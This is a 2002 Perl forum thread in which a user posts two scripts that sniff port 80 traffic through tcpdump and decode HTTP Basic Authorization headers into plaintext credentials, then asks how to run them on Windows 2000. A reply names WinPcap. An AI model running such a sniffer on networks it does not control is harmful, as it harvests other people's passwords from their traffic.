CGI/Perl Guide | Learning Center | Forums | Advertise | Login
Site Search: in

  Main Index MAIN
INDEX
Search Posts SEARCH
POSTS
Who's Online WHO'S
ONLINE
Log in LOG
IN

Home: Perl Programming Help: Win32 Programming Help:
packet sniffer

 



Bode
Novice

Dec 4, 2002, 8:24 AM

Post #1 of 2 (3562 views)
packet sniffer Can't Post

Below is two files which act as a packet sniffer. I havent been able to try them out as they are for UNIX and I dont have a root account on a UNIX.

Is there a way I can modify them for use on windows 2000 and in particular is there an equivilent tcpdump for windows 2000.

Cheers for any help or suggestions.



#!/usr/bin/perl

use Socket;
use MIME::Base64;


$|=1;
while (<>) {
next unless ($host,$client,$msg) = /(\S+) -> (\S+)\s+(.*)\s+/;
$msg=~s/(Authorization:\s+Basic\s+)(\S+)/$1 . decode_base64($2)/e;
print lookup($host)," -> ",lookup($client),"\t$msg\n";
}


sub lookup {
my $addr = shift;
my $lookup = (gethostbyaddr(inet_aton($addr),AF_INET))[0];
return $lookup || $addr;
}


#!/usr/bin/perl

$LIMIT = shift || 5000;

$|=1;
open (STDIN,"/usr/sbin/tcpdump -lnx -s 1024 dst port 80 |");
while (<>) {
if (/^\S/) {
last unless $LIMIT--;
while ($packet=~/(GET|POST|WWW-Authenticate|Authorization).+/g) {
print "$client -> $host\t$&\n";
}
undef $client; undef $host; undef $packet;
($client,$host) = /(\d+\.\d+\.\d+\.\d+).+ > (\d+\.\d+\.\d+\.\d+)/
if /P \d+:\d+\((\d+)\)/ && $1 > 0;
}
next unless $client && $host;
s/\s+//;
s/([0-9a-f]{2})\s?/chr(hex($1))/eg;
tr/\x1F-\x7E\r\n//cd;
$packet .= $_;
}





Sgt_B
Novice

Jan 2, 2003, 2:15 PM

Post #2 of 2 (3540 views)
Re: [Bode] packet sniffer [In reply to] Can't Post

WinPCap, is the windows alternative. Here's a link to a download site:

http://www.datanerds.net/~mike/netgroup-serv.polito.it/winpcap/install/default.htm

From what I hear, its not as good as tcpdump, but that's just something I heard....

Wink

 
 


Search for (options) Powered by Gossamer Forum v.1.2.0

Web Applications & Managed Hosting Powered by Gossamer Threads
Visit our Mailing List Archives